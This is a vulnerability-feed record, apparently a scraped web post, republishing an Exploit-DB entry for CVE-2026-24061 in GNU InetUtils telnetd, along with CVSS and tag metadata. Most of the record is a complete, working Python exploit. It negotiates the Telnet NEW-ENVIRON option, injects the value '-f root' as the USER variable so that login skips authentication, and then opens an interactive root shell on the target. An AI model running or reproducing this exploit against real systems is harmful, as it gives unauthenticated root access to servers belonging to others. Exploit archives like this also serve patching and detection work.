{“lastseen”:”2026-04-29T11:27:57″,”description”:”Exploit Title: GNU InetUtils telnetd – Remote Privilege Escalation Date: 2026-01-24 Exploit Author: Ali Guliyev infat0x Author GitHub: https:\/\/github.com\/infat0x Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link:…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”GNU InetUtils 2.6 – Telnetd Remote Privilege Escalation”,”source”:””,”references”:””,”id”:”EDB-ID:52524″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24061″],”sourceData”:”# Exploit Title: GNU InetUtils telnetd – Remote Privilege Escalation \\r\\n# Date: 2026-01-24\\r\\n# Exploit Author: Ali Guliyev (infat0x)\\r\\n# Author GitHub: https:\/\/github.com\/infat0x\\r\\n# Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/\\r\\n# Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/\\r\\n# Version: GNU InetUtils 2.0 through 2.6\\r\\n# Tested on: Linux (various distributions using vulnerable inetutils-telnetd)\\r\\n# CVE : CVE-2026-24061\\r\\n\\r\\nimport socket\\r\\nimport sys\\r\\nimport threading\\r\\nimport argparse\\r\\nimport re\\r\\n\\r\\n\\”\\”\\”\\r\\nDescription:\\r\\nThe telnetd implementation in GNU InetUtils before 2.7-2 is vulnerable to \\r\\nauthentication bypass via environment variable injection. By passing a \\r\\ncrafted USER environment variable (e.g., \\”-f root\\”) during the Telnet \\r\\nNEW-ENVIRON subnegotiation, an attacker can force the login process \\r\\nto grant a root shell without requiring a password.\\r\\n\\r\\nTechnical Analysis:\\r\\nThe vulnerability exists because telnetd fails to sanitize the USER variable \\r\\nbefore passing it as an argument to \/bin\/login. By prepending the -f flag, \\r\\nthe login utility skips the authentication phase.\\r\\n\\”\\”\\”\\r\\n\\r\\n# Telnet Protocol Constants (RFC 854)\\r\\nIAC = 255 # Interpret As Command\\r\\nDONT = 254\\r\\nDO = 253\\r\\nWONT = 252\\r\\nWILL = 251\\r\\nSB = 250 # Subnegotiation Begin\\r\\nSE = 240 # Subnegotiation End\\r\\n\\r\\n# Telnet Option Codes (RFC 1572)\\r\\nNEW_ENVIRON = 39 \\r\\nIS = 0\\r\\nVAR = 0\\r\\nVALUE = 1\\r\\n\\r\\ndef handle_negotiation(sock, cmd, opt):\\r\\n \\”\\”\\”Responds to standard Telnet negotiation sequences.\\”\\”\\”\\r\\n if cmd == DO and opt == NEW_ENVIRON:\\r\\n # Agreement to use the environment variable passing option\\r\\n sock.sendall(bytes([IAC, WILL, NEW_ENVIRON]))\\r\\n elif cmd == DO:\\r\\n # Refuse other options for simplicity\\r\\n sock.sendall(bytes([IAC, WONT, opt]))\\r\\n elif cmd == WILL:\\r\\n # Acknowledge the server’s willingness\\r\\n sock.sendall(bytes([IAC, DO, opt]))\\r\\n\\r\\ndef handle_subnegotiation(sock, sb_data, user_payload):\\r\\n \\”\\”\\”Executes the core exploit by injecting the malformed USER variable.\\”\\”\\”\\r\\n if len(sb_data) \\u003e 0 and sb_data[0] == NEW_ENVIRON:\\r\\n # Format: IAC SB NEW_ENVIRON IS VAR \\”USER\\” VALUE \\”-f root\\” IAC SE\\r\\n env_msg = (\\r\\n bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + \\r\\n b’USER’ + \\r\\n bytes([VALUE]) + \\r\\n user_payload.encode(‘ascii’) + \\r\\n bytes([IAC, SE])\\r\\n )\\r\\n sock.sendall(env_msg)\\r\\n\\r\\ndef process_telnet_stream(data, sock, user_payload):\\r\\n \\”\\”\\”Parses incoming data to separate control signals from actual text.\\”\\”\\”\\r\\n clean_output = b”\\r\\n i = 0\\r\\n while i \\u003c len(data):\\r\\n if data[i] == IAC and i + 1 \\u003c len(data):\\r\\n cmd = data[i + 1]\\r\\n if cmd in [DO, DONT, WILL, WONT] and i + 2 \\u003c len(data):\\r\\n handle_negotiation(sock, cmd, data[i + 2])\\r\\n i += 3\\r\\n elif cmd == SB:\\r\\n se_idx = i + 2\\r\\n while se_idx \\u003c len(data) – 1:\\r\\n if data[se_idx] == IAC and data[se_idx + 1] == SE:\\r\\n break\\r\\n se_idx += 1\\r\\n if se_idx \\u003c len(data) – 1:\\r\\n handle_subnegotiation(sock, data[i + 2:se_idx], user_payload)\\r\\n i = se_idx + 2\\r\\n else:\\r\\n i += 1\\r\\n else:\\r\\n i += 2\\r\\n else:\\r\\n clean_output += bytes([data[i]])\\r\\n i += 1\\r\\n\\r\\n # Filter ANSI escape sequences for a cleaner shell experience\\r\\n ansi_escape = re.compile(rb’\\\\x1b\\\\[[0-?]*[ -\/]*[@-~]’)\\r\\n return ansi_escape.sub(b”, clean_output)\\r\\n\\r\\ndef socket_reader_thread(sock, user_payload):\\r\\n \\”\\”\\”Background thread to handle server output.\\”\\”\\”\\r\\n try:\\r\\n while True:\\r\\n raw_data = sock.recv(4096)\\r\\n if not raw_data:\\r\\n break\\r\\n display_data = process_telnet_stream(raw_data, sock, user_payload)\\r\\n if display_data:\\r\\n sys.stdout.buffer.write(display_data)\\r\\n sys.stdout.buffer.flush()\\r\\n except (ConnectionResetError, BrokenPipeError):\\r\\n pass\\r\\n finally:\\r\\n print(\\”\\\\n[*] Connection closed.\\”)\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(description=\\”CVE-2026-24061 Exploitation Tool\\”)\\r\\n parser.add_argument(‘host’, help=\\”Target IP address\\”)\\r\\n parser.add_argument(‘-p’, ‘–port’, type=int, default=23, help=\\”Telnet port (default 23)\\”)\\r\\n args = parser.parse_args()\\r\\n\\r\\n # The exploit payload to bypass login\\r\\n user_payload = \\”-f root\\”\\r\\n \\r\\n try:\\r\\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\r\\n client_sock.settimeout(5)\\r\\n client_sock.connect((args.host, args.port))\\r\\n client_sock.settimeout(None)\\r\\n print(f\\”[*] Connected to {args.host}:{args.port}\\”)\\r\\n print(f\\”[*] Sending payload: {user_payload}\\”)\\r\\n except Exception as e:\\r\\n print(f\\”[!] Connection failed: {e}\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n # Launch output listener\\r\\n threading.Thread(target=socket_reader_thread, args=(client_sock, user_payload), daemon=True).start()\\r\\n\\r\\n print(\\”[*] Interactive session started. Type commands below.\\\\n\\”)\\r\\n try:\\r\\n while True:\\r\\n # Simple interactive shell loop\\r\\n char = sys.stdin.read(1)\\r\\n if not char:\\r\\n break\\r\\n client_sock.sendall(char.encode())\\r\\n except KeyboardInterrupt:\\r\\n print(\\”\\\\n[*] Exploit session terminated by user.\\”)\\r\\n finally:\\r\\n client_sock.close()\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52524″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52524″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-29T11:27:57″,”description”:”Exploit Title: GNU InetUtils telnetd – Remote Privilege Escalation Date: 2026-01-24 Exploit Author: Ali Guliyev infat0x Author GitHub: https:\/\/github.com\/infat0x Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link:…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”GNU InetUtils…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-50119","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n